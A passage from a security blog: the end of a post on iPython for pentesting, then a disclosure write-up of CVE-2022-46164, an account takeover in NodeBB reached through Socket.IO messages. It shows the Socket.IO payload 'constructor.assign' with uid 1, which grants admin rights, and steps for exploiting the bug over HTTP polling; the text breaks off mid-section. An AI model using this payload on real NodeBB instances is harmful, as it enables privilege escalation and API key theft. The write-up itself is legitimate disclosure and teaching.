<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [82]: [a['sAMAccountName'] for a in ad_data['users'] if 'userAccountControlFlags' in a and 'ACCOUNTDISABLE' in a['userAccountControlFlags']]
Out[82]: ['krbtgt', 'Guest']
</code></pre></div></div>
<p>Hopefully this provides a good example of how to explore complex data in iPython.</p>
<h1 id="other-specific-use-cases">Other specific use cases</h1>
<p>Some other examples of how to use iPython to do security related tasks are included below.</p>
<h2 id="nmap">Nmap</h2>
<p>I wrote a blog post back in 2016 about how to use the <code class="language-plaintext highlighter-rouge">libnmap</code> module to parse NMap scan files and extract useful information from them using list comprehensions <a href="https://thegreycorner.com/2016/04/30/list-comprehension-one-liners-to.html">here</a></p>
<h2 id="burp">Burp</h2>
<p><a href="https://github.com/stephenbradshaw/BurpPythonGateway">This Burp extension</a> that I wrote makes Burp internals of the running session available to Python.</p>
<p>The readme has examples of how to look at the site map, the proxy history, and get the contents of requests and responses.</p>Stephen BradshawA lot of my day job in pentesting/offensive security involves processing varied chunks of data, and ad hoc automation of tasks. For the last several years, Ive been using iPython, the interactive Python environment to do this. While iPython has pretty wide use in various other computing fields, to my knowledge it’s not used very widely in security. Whenever I have the rare opportunity to demonstrate how I use it to other pentesters however, they seem to be impressed by how useful it is. This post will be an attempt to explain why I think iPython is so useful for security related workflows.CVE-2022-46164 Account takeover via prototype vulnerability in NodeBB2023-01-04T05:23:00+00:002023-01-04T05:23:00+00:00/2023/01/04/CVE-2022-46164-writeup<p>During a recent security assessment, I found an account takeover vulnerability in NodeBB. I reported this to the NodeBB developers on 28 November 2022, who provided a <a href="https://github.com/NodeBB/NodeBB/commit/48d143921753914da45926cca6370a92ed0c46b8">patch</a> within the hour. The vulnerability has CVE ID CVE-2022-46164, with a rating of <strong>9.4: Critical</strong>. The security notification is <a href="https://github.com/NodeBB/NodeBB/security/advisories/GHSA-rf3g-v8p5-p675">here</a>. Non administrative NodeBB users can run admin functions and escalate privileges. In some configurations, anonymous users can do the same. The vulnerability affects all NodeBB releases prior to version <del><a href="https://github.com/NodeBB/NodeBB/releases/tag/v2.6.1">2.6.1</a></del> <a href="https://github.com/NodeBB/NodeBB/releases/tag/v2.8.1">2.8.1</a> (see update below). If you are running NodeBB, you should update now.</p>
<p><strong>UPDATE 05/01/2023:</strong> The <a href="https://github.com/NodeBB/NodeBB/commit/48d143921753914da45926cca6370a92ed0c46b8">initial patch</a> mentioned above does not provide complete protection against exploitation of this vulnerability. An <a href="https://github.com/NodeBB/NodeBB/commit/586eed1407a78a1c1ec3af9bef3866104d3ef7cd">additional patch</a> has been performed by the NodeBB devs that protects against exploitation using nested objects. This patch is included in version <a href="https://github.com/NodeBB/NodeBB/releases/tag/v2.8.1">2.8.1</a>, which you should update to. Ive added an additional section at the bottom of this post which talks about the new patch and the attack variants that it protects against.</p>
<p>This post covers how I discovered the vulnerability and how to exploit it. <a href="https://github.com/NodeBB/NodeBB">NodeBB</a> is open source, so you can follow along. The vulnerability makes use of JavaScript specific features and application specific knowledge. Finding and exploiting this bug was a fun and interesting learning exercise.</p>
<h2 id="nodebb-setup">NodeBB setup</h2>
<p>As described on the <a href="https://github.com/NodeBB/NodeBB">GitHub repository</a> for the product:</p>
<blockquote>
<p>NodeBB Forum Software is powered by Node.js and supports either Redis, MongoDB, or a PostgreSQL database. It utilizes web sockets for instant interactions and real-time notifications. NodeBB takes the best of the modern web: real-time streaming discussions, mobile responsiveness, and rich RESTful read/write APIs, while staying true to the original bulletin board/forum format → categorical hierarchies, local user accounts, and asynchronous messaging.</p>
<p>NodeBB by itself contains a “common core” of basic functionality, while additional functionality and integrations are enabled through the use of third-party plugins.</p>
</blockquote>
<p>During the assessment I had a copy of NodeBB running in a VM with debugging enabled. For debugging I had the <a href="https://github.com/NodeBB/NodeBB">NodeBB</a> source code open in Visual Studio Code.</p>
<p>I installed NodeBB on an Ubuntu VM as per the instructions <a href="https://docs.nodebb.org/installing/os/ubuntu/">here</a>. You will need to change these steps and install an older version of the NodeBB source code. Get commit <a href="https://github.com/NodeBB/NodeBB/commit/8a15e58dff72481f83a0c020459505b6638775f1">8a15e58dff72481f83a0c020459505b6638775f1</a>, or <a href="https://github.com/NodeBB/NodeBB/releases/tag/v2.6.0">release 2.6.0</a>. The code references in this post will refer to commit <code class="language-plaintext highlighter-rouge">8a15e58dff72481f83a0c020459505b6638775f1</code>.</p>
<p>While NodeBB Docker containers exist, I chose not to use them. The debugging setup I used is much easier to run in a VM.</p>
<h2 id="my-testing-environment">My testing environment</h2>
<p>Once NodeBB is running, we will setup Node debugging in Visual Studio Code to explore application internals. I will provide basic instructions on how to do this, but if you need more details you can go <a href="https://code.visualstudio.com/docs/editor/debugging">here</a>.</p>
<p>Clone a copy of the NodeBB code from the VM to your local drive. Then open the <strong><em>folder</em></strong> containing the code in Visual Studio Code. Click the <code class="language-plaintext highlighter-rouge">Run and Debug</code> option in the left hand pane of Visual Studio Code. You should then see an option to <code class="language-plaintext highlighter-rouge">create a launch.json file</code>. Click this and select <code class="language-plaintext highlighter-rouge">Node.js</code> from the list of options. This will provide a basic template <code class="language-plaintext highlighter-rouge">launch.json</code> debugging config you can edit to meet your needs. My edited config file looked like the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
"version": "0.2.0",
"configurations": [
{
"address": "127.0.0.1",
"localRoot": "${workspaceFolder}",
"name": "Attach to Remote",
"port": 9229,
"remoteRoot": "/home/stephen/nodebb",
"request": "attach",
"skipFiles": [
"<node_internals>/**"
],
"type": "node"
}
]
}
</code></pre></div></div>
<p>You will need to change the values for <code class="language-plaintext highlighter-rouge">address</code>, <code class="language-plaintext highlighter-rouge">port</code> and <code class="language-plaintext highlighter-rouge">remoteRoot</code> to match your setup. The values for <code class="language-plaintext highlighter-rouge">address</code> and <code class="language-plaintext highlighter-rouge">port</code> will configure the address of the Node debugging server on your VM. I used ssh port forwarding to connect <code class="language-plaintext highlighter-rouge">127.0.0.1:9229</code> on the VM to my local machine. The <code class="language-plaintext highlighter-rouge">remoteRoot</code> setting is the location of the NodeBB code on your VM. This folder should contain the same files as the folder you opened in Visual Studio Code.</p>
<p>I had problems with NodeBB not responding to logon requests while debugging. The error “must be 0 or in range 1024 to 65535” appeared in the Node console. I suspect this is due to some part of the logon process forking to a new process. I never figured out how to fix this, and ended up just working around it. My workaround involved having debugging disabled when logging on. So, I logged on without the debugger to get a session cookie in my browser. Then relaunched NodeBB with debugging enabled once I had an active session.</p>
<p>This involved running NodeBB with these two different commands, with <code class="language-plaintext highlighter-rouge">remoteRoot</code> as the working directory:</p>
<p>No debugging</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./nodebb dev
</code></pre></div></div>
<p>Debugging</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>node --inspect-brk=127.0.0.1:9229 ./app.js
</code></pre></div></div>
<p>This debugging mode will pause execution of NodeBB at the application entry point. It requires that you connect to the debugging agent and “resume” before you can browse NodeBB.</p>
<p>Its also useful to have a running copy of the Node REPL to be able to quickly try things out. Eg:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ node
Welcome to Node.js v16.18.1.
Type ".help" for more information.
> console.log('REPL')
REPL
undefined
>
</code></pre></div></div>
<p>I also used Firefox and Burp Suite Professional to inspect NodeBB traffic.</p>
<h2 id="the-vulnerability">The vulnerability</h2>
<p>CVE-2022-46164 resides within the Socket.IO implementation in NodeBB. This code enables socket based communication and handles a wide variety of forum functions.</p>
<p>I started examining this functionality when I noticed WebSocket traffic in Burp. An example message looked like the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>426["admin.config.setMultiple",{"title":"NodeBB1","title:short":"","title:url":"","showSiteTitle":"1","browserTitle":"","titleLayout":"","description":"","keywords":"","brand:logo":"","brand:logo:url":"","brand:logo:alt":"","og:image":"","brand:favicon":"","brand:touchIcon":"","brand:maskableIcon":"","searchDefaultIn":"titlesposts","searchDefaultInQuick":"titles","searchDefaultSortBy":"relevance","useOutgoingLinksPage":"0","outgoingLinks:whitelist":"","themeColor":"","backgroundColor":"","undoTimeout":"10000"}]
</code></pre></div></div>
<p>Not all messages were like this, but a number seemed to contain JSON content. The messages sent <strong>to</strong> the server with JSON started with numbers beginning with <code class="language-plaintext highlighter-rouge">42</code>. The JSON content in these messages appeared to include function names and parameters.</p>
<p>On seeing this, I looked for the code handling these messages. First to see if (and how) these “function names” were resolved within the code. And second to see if I could abuse it.</p>
<p>The Socket.IO code which handles these message is <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js">here</a>. The <code class="language-plaintext highlighter-rouge">onMessage</code> function at <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L110">line 100</a> runs when the server receives Socket.IO messages. Let’s review the code to try and understand its purpose.</p>
<p>The function definition tells us it runs with two parameters - <code class="language-plaintext highlighter-rouge">socket</code> and <code class="language-plaintext highlighter-rouge">payload</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>async function onMessage(socket, payload) {
</code></pre></div></div>
<p>These are likely the socket for communication and the data for the message. We can’t tell the data type or properties of either parameter from this. Lets keep reading to see if this becomes clearer.</p>
<p>Beginning at <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L115">line 115</a>, we have.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const eventName = payload.data[0];
const params = typeof payload.data[1] === 'function' ? {} : payload.data[1];
const callback = typeof payload.data[payload.data.length - 1] === 'function' ? payload.data[payload.data.length - 1] : function () {};
</code></pre></div></div>
<p>This code uses the <code class="language-plaintext highlighter-rouge">payload</code> parameter to define values for <code class="language-plaintext highlighter-rouge">eventName</code>, <code class="language-plaintext highlighter-rouge">params</code> and <code class="language-plaintext highlighter-rouge">callback</code>. Beginning on <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L115">line 123</a>, <code class="language-plaintext highlighter-rouge">eventName</code>, derived from <code class="language-plaintext highlighter-rouge">payload</code>, is used to define <code class="language-plaintext highlighter-rouge">methodToCall</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const parts = eventName.toString().split('.');
const namespace = parts[0];
const methodToCall = parts.reduce((prev, cur) => {
if (prev !== null && prev[cur]) {
return prev[cur];
}
return null;
}, Namespaces);
</code></pre></div></div>
<p>In the code starting on <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L159">line 159</a>, <code class="language-plaintext highlighter-rouge">methodToCall</code> is executed as a function. The specific method of calling differs dependant on the type of function it is. Either an <code class="language-plaintext highlighter-rouge">AsyncFunction</code> or a regular synchronous one. In both cases, the <code class="language-plaintext highlighter-rouge">socket</code> and <code class="language-plaintext highlighter-rouge">params</code> variables are used as parameters to the function. The <code class="language-plaintext highlighter-rouge">callback</code> variable is also called as a function, with the <code class="language-plaintext highlighter-rouge">result</code> from <code class="language-plaintext highlighter-rouge">methodToCall</code> as a parameter.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (methodToCall.constructor && methodToCall.constructor.name === 'AsyncFunction') {
const result = await methodToCall(socket, params);
callback(null, result);
} else {
methodToCall(socket, params, (err, result) => {
callback(err ? { message: err.message } : null, result);
});
}
</code></pre></div></div>
<p>With user provided input defining functions to execute, remote code execution looks plausible. Let’s debug the function and see whats happening internally.</p>
<p>Put a breakpoint at line 115 in Visual Studio Code by clicking to the left of the line number. Then we will send a crafted WebSocket message and see what happens.</p>
<p>Lets try and send the following to see if we can set the values for <code class="language-plaintext highlighter-rouge">eventName</code>, <code class="language-plaintext highlighter-rouge">params</code> and <code class="language-plaintext highlighter-rouge">callback</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>421["myEventName",["myParams"],"myCallback"]
</code></pre></div></div>
<p>The easiest way to do this is to reuse an existing WebSocket in Burp to send our own message.</p>
<p><strong>Disable the breakpoint</strong> by unticking it in the Breakpoints pane in Visual Studio Code.</p>
<p>Then refresh NodeBB in your browser. This should cause WebSocket messages to appear in the “Websockets History” tab in Burp. Send one of these messages to Burp’s Repeater. Ensure the <code class="language-plaintext highlighter-rouge">Send</code> option is available. If it isn’t, the socket is dead. Repeat this process until you can get a live socket in Repeater.</p>
<p><strong>Enable the breakpoint</strong> again in Visual Studio Code. Then select <code class="language-plaintext highlighter-rouge">To server</code> in the drop down box and send the message.</p>
<figure><img src="/assets/img/cve202246164_image1.jpg" alt="Sending data via WebSockets in Burp" /><figcaption align="center">Fig.1 - Sending data via WebSocket in Burp</figcaption></figure>
<p>Once you send the message, NodeBB should pause in the Visual Studio Code debugger. We can now explore the programs internals.</p>
<p>Let’s start by viewing the <code class="language-plaintext highlighter-rouge">payload</code> variable. Type <code class="language-plaintext highlighter-rouge">payload</code> in the “Debug Console” in Visual Studio Code. This will dump the variable in a form we can explore by expanding the sections that interest us.</p>
<figure><img src="/assets/img/cve202246164_image2.jpg" alt="Exploring the payload variable in the debugger" /><figcaption align="center">Fig.2 - Exploring the payload variable in the debugger</figcaption></figure>
<p>From this we can see:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">payload.data[0]</code> contains <code class="language-plaintext highlighter-rouge">myEventName</code>,</li>
<li><code class="language-plaintext highlighter-rouge">payload.data[1]</code> contains<code class="language-plaintext highlighter-rouge">['myParams']</code>, and</li>
<li><code class="language-plaintext highlighter-rouge">payload.data[2]</code> contains <code class="language-plaintext highlighter-rouge">myCallback</code>.</li>
</ul>
<p>Yet, we can also see content that we <strong>did not</strong> provide stored in <code class="language-plaintext highlighter-rouge">payload.data[3]</code>. This last element of <code class="language-plaintext highlighter-rouge">payload.data</code> array is the one that gets stored in the <code class="language-plaintext highlighter-rouge">callback</code> variable.</p>
<p>It looks like we <strong>can</strong> control the values of <code class="language-plaintext highlighter-rouge">eventName</code> and <code class="language-plaintext highlighter-rouge">params</code>, but <strong>not</strong> <code class="language-plaintext highlighter-rouge">callback</code>. If we step through the code to line 119 and view the values of these variables in the console, we can see this is the case.</p>
<figure><img src="/assets/img/cve202246164_image3.jpg" alt="Checking the eventName, etc variables..." /><figcaption align="center">Fig.3 - Checking the eventName, etc variables...</figcaption></figure>
<p>Lets continue stepping through the code and see what happens next. If we step to line 125, we can see how the <code class="language-plaintext highlighter-rouge">methodToCall</code> variable is set.</p>
<p>On <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L123">line 123</a>, the <code class="language-plaintext highlighter-rouge">eventName</code> variable is split on the <code class="language-plaintext highlighter-rouge">.</code> character and placed into the <code class="language-plaintext highlighter-rouge">parts</code> array. Our provided value, <code class="language-plaintext highlighter-rouge">myEventName</code> contains no <code class="language-plaintext highlighter-rouge">.</code> characters, resulting in <code class="language-plaintext highlighter-rouge">parts</code> being defined as <code class="language-plaintext highlighter-rouge">['myEventName']</code>.</p>
<p>Next, on <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L124">line 124</a>, <code class="language-plaintext highlighter-rouge">namespace</code> is set to the first element of the <code class="language-plaintext highlighter-rouge">parts</code> array. This is <code class="language-plaintext highlighter-rouge">myEventName</code> in our case.</p>
<p>Next, on <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L125">line 125</a> the <code class="language-plaintext highlighter-rouge">methodToCall</code> variable is set. The code defining this variable continues over several lines, so it helps to break it down a little.</p>
<p>As a reminder, it looks like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const methodToCall = parts.reduce((prev, cur) => {
if (prev !== null && prev[cur]) {
return prev[cur];
}
return null;
}, Namespaces);
</code></pre></div></div>
<p>This code is running the JavaScript <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/reduce">reduce</a> method against the <code class="language-plaintext highlighter-rouge">parts</code> array. <code class="language-plaintext highlighter-rouge">reduce</code> repeatedly runs a provided function on every element of an array. The output of the previous execution is then used as the input of the next. An initial value is provided to <code class="language-plaintext highlighter-rouge">reduce</code> for input to the first iteration of the function. In this case the value is the <code class="language-plaintext highlighter-rouge">Namespaces</code> variable.</p>
<p>The function executed in this case is one that accesses an existing property of an object by name. This operates in the manner of <code class="language-plaintext highlighter-rouge">object['propertyName']</code>. If the property does not exist, the function returns <code class="language-plaintext highlighter-rouge">null</code>.</p>
<p>So in this particular case, it would <em>try</em> and access <code class="language-plaintext highlighter-rouge">Namespaces['myEventName']</code>. If <code class="language-plaintext highlighter-rouge">parts</code> contains multiple elements, subsequent elements operate as child accessors. So a <code class="language-plaintext highlighter-rouge">parts</code> value of <code class="language-plaintext highlighter-rouge">['element1','element2',]</code> is equal to <code class="language-plaintext highlighter-rouge">Namespaces['element1']['element2']</code> . Thus, <code class="language-plaintext highlighter-rouge">Namespaces</code> functions as an allow list for populating <code class="language-plaintext highlighter-rouge">methodToCall</code>.</p>
<p>Whats in this <code class="language-plaintext highlighter-rouge">Namespaces</code> variable thats restricting the functions we can call?</p>
<p>It’s defined on <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L16">line 16</a> as below.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const Namespaces = {};
</code></pre></div></div>
<p>And it is populated with values in the function <code class="language-plaintext highlighter-rouge">requireModules</code> on <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L173">line 173</a> like so.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function requireModules() {
const modules = [
'admin', 'categories', 'groups', 'meta', 'modules',
'notifications', 'plugins', 'posts', 'topics', 'user',
'blacklist', 'uploads',
];
modules.forEach((module) => {
Namespaces[module] = require(`./${module}`);
});
}
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">Namespaces</code> contains each of the named modules in the <code class="language-plaintext highlighter-rouge">/src/socket.io</code> folder in the NodeBB code. Functions from <code class="language-plaintext highlighter-rouge">admin.js</code> are under the property <code class="language-plaintext highlighter-rouge">Namespaces['admin']</code> and so on. If we view <code class="language-plaintext highlighter-rouge">Namespaces</code> in the Debug Console we can see these module names.</p>
<figure><img src="/assets/img/cve202246164_image4.jpg" alt="The Namespaces variable in the debugger" /><figcaption align="center">Fig.4 - The Namespaces variable in the debugger</figcaption></figure>
<p>Something else we can see in the above however is a lighter colored <code class="language-plaintext highlighter-rouge">[[Prototype]]</code> reference. What is this?</p>
<p>JavaScript has prototype inheritance for objects. For a detailed explanation, you can read <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Inheritance_and_the_prototype_chain">here</a>.</p>
<p>Objects in JavaScript inherit additional properties through parent objects. These properties are accessible through the “prototype” of the object. By default, this applies to even the simplest object types. Those defined like <code class="language-plaintext highlighter-rouge">Namespaces</code> above.</p>
<p>Sometimes, it’s possible to change properties of parent objects from the child. This last characteristic leads to a class of vulnerabilities called “prototype pollution”. Objects based on a modified parent become “polluted” from changes to that parent. This “pollution” can lead to the program to operate in unintended ways.</p>
<p>This is not the case here. We are not going to be “polluting” any objects. We <strong>can</strong> use the prototype of <code class="language-plaintext highlighter-rouge">Namespaces</code> to assign unintended functions to <code class="language-plaintext highlighter-rouge">methodToCall</code>.</p>
<p>If we expand the <code class="language-plaintext highlighter-rouge">[[Prototype]]</code> entry in the Debug Console, we can see what the prototype gives us access to.</p>
<figure><img src="/assets/img/cve202246164_image5.jpg" alt="Namespaces expanded" /><figcaption align="center">Fig.5 - Namespaces expanded</figcaption></figure>
<p>Whatever we select, it has to do something useful when executed as per <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L163">line 163</a> in the NodeBB code. Assuming that the function is not of type Async, which is the case for all the prototype functions.</p>
<p>As a reminder, the (non-Async) invocation of <code class="language-plaintext highlighter-rouge">methodToCall</code> looks like this. (Code reformatted to fit on one line).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>methodToCall(socket, params, (err, result) => {callback(err ? { message: err.message } : null, result);});
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">methodToCall</code> is invoked with three parameters. The first is the <code class="language-plaintext highlighter-rouge">socket</code> parameter passed to the <code class="language-plaintext highlighter-rouge">onMessage</code> function. The second is the <code class="language-plaintext highlighter-rouge">params</code> variable which we control. The third is an anonymous function which executes the <code class="language-plaintext highlighter-rouge">callback</code> that we don’t control.</p>
<p>Back to the <code class="language-plaintext highlighter-rouge">params</code> variable. What type of content can we include in this?</p>
<p>Can we pass a function that we could have executed? Unfortunately, it appears not. The <code class="language-plaintext highlighter-rouge">socket.io-parser</code> Node module does a simple <code class="language-plaintext highlighter-rouge">JSON.parse</code> on received data. This means we can only provide a limited set of simple types for this value. Anything thats not reducible to standard JSON causes an error.</p>
<p>I spent many hours attempting code execution using the <code class="language-plaintext highlighter-rouge">Namespace</code> prototype accessor. Without success. (Let me know if you manage it). Then I decided to see what I could do to the <code class="language-plaintext highlighter-rouge">socket</code> object. Here is what this object looks like in the debugger.</p>
<figure><img src="/assets/img/cve202246164_image6.jpg" alt="The socket variable" /><figcaption align="center">Fig.6 - The socket variable</figcaption></figure>
<p>One property that immediately jumped out at me here was the <code class="language-plaintext highlighter-rouge">uid</code> parameter. The screenshot above is from a session logged on as <code class="language-plaintext highlighter-rouge">admin</code> user, with a user id of 1. Unsurprisingly, the <code class="language-plaintext highlighter-rouge">uid</code> value here matches the user id of the user that created the socket. This is also the value used to make access control decisions for socket operations. If you call an admin function in the socket, the <code class="language-plaintext highlighter-rouge">uid</code> value must be an admin user id. If a non admin user can change their socket’s <code class="language-plaintext highlighter-rouge">uid</code> value to an admin’s user id, they can call admin functions.</p>
<p>Remember that <code class="language-plaintext highlighter-rouge">socket</code> is the first parameter provided to <code class="language-plaintext highlighter-rouge">methodToCall</code>. And the second is <code class="language-plaintext highlighter-rouge">params</code> which we control, but which can contain only simple types. Is there a function in the prototype that allows us to change <code class="language-plaintext highlighter-rouge">socket</code> given these conditions? We need a function that takes at least two parameters and modifies its first parameter based on the second.</p>
<p>As it turns out, there is: <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/assign">Object.assign()</a>. <code class="language-plaintext highlighter-rouge">assign</code> copies the properties from the object in parameter two to the object in parameter one, and leaves all other properties of object one unmodified. This is exactly what we need.</p>
<p>We are also lucky in that JavaScript also just ignores extraneous function parameters. Instead of just erroring out as would happen in most other programming languages. Meaning we don’t have to worry about the anonymous function in parameter three.</p>
<p>Here we can see the assign function within the prototype inheritance of the <code class="language-plaintext highlighter-rouge">Namespaces</code> object.</p>
<figure><img src="/assets/img/cve202246164_image7.jpg" alt="The assign function under Namespaces" /><figcaption align="center">Fig.7 - The assign function under Namespaces</figcaption></figure>
<p>And here we see how its possible to access the assign function via <code class="language-plaintext highlighter-rouge">Namespaces</code>. We can use the syntax <code class="language-plaintext highlighter-rouge">Namespaces['__proto__']['constructor']['assign']</code>, or the shorter version <code class="language-plaintext highlighter-rouge">Namespaces['constructor']['assign']</code></p>
<figure><img src="/assets/img/cve202246164_image8.jpg" alt="Accessing the assign function through Namespaces array index" /><figcaption align="center">Fig.8 - Accessing the assign function through Namespaces array index</figcaption></figure>
<p>This snippet run in the node REPL shows how this attack will work. We set initial values for <code class="language-plaintext highlighter-rouge">socket</code>, <code class="language-plaintext highlighter-rouge">Namespaces</code> and <code class="language-plaintext highlighter-rouge">params</code> to mimic NodeBB operating as a non admin.</p>
<p>We set <code class="language-plaintext highlighter-rouge">Namespaces</code> to its empty default state, which still contains the prototype.</p>
<p>We set <code class="language-plaintext highlighter-rouge">socket</code> with a <code class="language-plaintext highlighter-rouge">uid</code> of <code class="language-plaintext highlighter-rouge">2</code> and an additional mock value we want to remain unchanged.</p>
<p>We set <code class="language-plaintext highlighter-rouge">params</code> to an object where <code class="language-plaintext highlighter-rouge">uid</code> is <code class="language-plaintext highlighter-rouge">1</code>. This is our desired value for <code class="language-plaintext highlighter-rouge">uid</code> in <code class="language-plaintext highlighter-rouge">socket</code>.</p>
<p>Then we assign the <code class="language-plaintext highlighter-rouge">assign</code> function to <code class="language-plaintext highlighter-rouge">methodToCall</code> using the <code class="language-plaintext highlighter-rouge">Namespaces</code> prototype. This is functionally the manner in which NodeBB operates if passed <code class="language-plaintext highlighter-rouge">constructor.assign</code> as a function name.</p>
<p>Finally we call <code class="language-plaintext highlighter-rouge">methodToCall</code> in the same way that NodeBB does.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>node
Welcome to Node.js v16.18.1.
Type ".help" for more information.
> Namespaces = {}
{}
> socket = {'uid': 2, 'otherThing': 'value'}
{ uid: 2, otherThing: 'value' }
> params = {'uid': 1}
{ uid: 1 }
> methodToCall = Namespaces['constructor']['assign']
[Function: assign]
> methodToCall(socket, params, (err, result) => {callback(err ? { message: err.message } : null, result);})
{ uid: 1, otherThing: 'value' }
> socket
{ uid: 1, otherThing: 'value' }
>
</code></pre></div></div>
<p>Note after <code class="language-plaintext highlighter-rouge">methodToCall</code> executes the <code class="language-plaintext highlighter-rouge">uid</code> property of <code class="language-plaintext highlighter-rouge">socket</code> has changed to <code class="language-plaintext highlighter-rouge">1</code>. The other mock property of <code class="language-plaintext highlighter-rouge">socket</code> remains unchanged.</p>
<p>For us to perform this operation through a socket call we would send the following to NodeBB:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>421["constructor.assign",{"uid":1}]
</code></pre></div></div>
<p>Lets log on to NodeBB as a non-admin user and try this. (Remember you might have to temporarily disable debugging to logon). Lets debug and confirm the <code class="language-plaintext highlighter-rouge">uid</code> value in <code class="language-plaintext highlighter-rouge">socket</code>.</p>
<figure><img src="/assets/img/cve202246164_image9.jpg" alt="Checking the uid value in the socket" /><figcaption align="center">Fig.9 - Checking the uid value in the socket</figcaption></figure>
<p><strong>Disable debugging</strong> now so we can communicate with the socket without interrruption.</p>
<p>Now lets send an test admin request to the socket. Here we try to fetch API keys from the application settings. We are not an admin, so we get a message back saying <code class="language-plaintext highlighter-rouge">error:no-privileges</code>:</p>
<figure><img src="/assets/img/cve202246164_image10.jpg" alt="Unsuccessfully attempting an admin function call" /><figcaption align="center">Fig.10 - Unsuccessfully attempting an admin function call</figcaption></figure>
<p>Next, we send our privilege escalation attack. See the message sent at 15:24:54 in the History tab in Fig 11 below.</p>
<p>Then we repeat the admin operation.</p>
<figure><img src="/assets/img/cve202246164_image11.jpg" alt="Privilege escalation and successfully performing an admin function call" /><figcaption align="center">Fig.11 - Privilege escalation and successfully performing an admin function call</figcaption></figure>
<p>This time it is a success. We can retrieve API keys.</p>
<p>Under the right circumstances, this attack also works on unauthenticated NodeBB sessions. These have sockets with a <code class="language-plaintext highlighter-rouge">uid</code> of 0. This requires that NodeBB has no enabled plugins that modify socket authorisation checks. The 2factor plugin is one example of a plugin that does this. It checks session properties when making socket access control decisions. An authenticated session of some type must exist for the check to succeed. So when a plugin like this is enabled, this is just a privilege escalation, not an authorisation bypass.</p>
<h2 id="exploiting-behind-fronting-services-and-enhancing-ease-of-use">Exploiting behind fronting services and enhancing ease of use</h2>
<p>To this point, exploitation of this vulnerability has been awkward. We piggybacked on existing WebSocket connections in Burp. We need to send any admin functions we want to run within the same escalated socket to get them to work. Also, if the NodeBB instance does not support WebSockets, this approach wont work at all. If the NodeBB instance is hosted behind fronting providers like CloudFlare, is likely WebSockets wont be supported.</p>
<p>We can address this by using Socket.IO “polling”. This is the mode that Socket.IO uses to operate over pure HTTP.</p>
<p>To see this natively in NodeBB you can modify your <code class="language-plaintext highlighter-rouge">config.json</code> file as described <a href="https://community.nodebb.org/topic/9990/how-to-use-nodebb-websocket-with-cdn-which-doesn-t-support-websocket">here</a>. This will disable WebSocket support and allow you to observe the “polling” mode in operation. This provides a good example for reverse engineering.</p>
<p>The following is a high level explanation of how polling can be used. If you are looking to escalate privileges for an existing session, make sure to include the session cookie with all requests on the socket.</p>
<p>You can establish a polling based session with NodeBB by sending a HTTP <code class="language-plaintext highlighter-rouge">GET</code> request to a URL as shown below.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/socket.io/?EIO=4&transport=polling&t=mGkgMb
</code></pre></div></div>
<p>The value of the <code class="language-plaintext highlighter-rouge">t</code> URL parameter is set to a random 6 character alpha string. In this case <code class="language-plaintext highlighter-rouge">mGkgMb</code>. This value changes with each new socket.</p>
<p>The HTTP response from NodeBB will be contain similar to the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0{"sid":"cifBV2fveLLpUfAEAAAE","upgrades":[],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">sid</code> value returned is sent as a <code class="language-plaintext highlighter-rouge">GET</code> parameter along with all future requests on the socket. In this example all further communication on this socket will go to the following URL.</p>
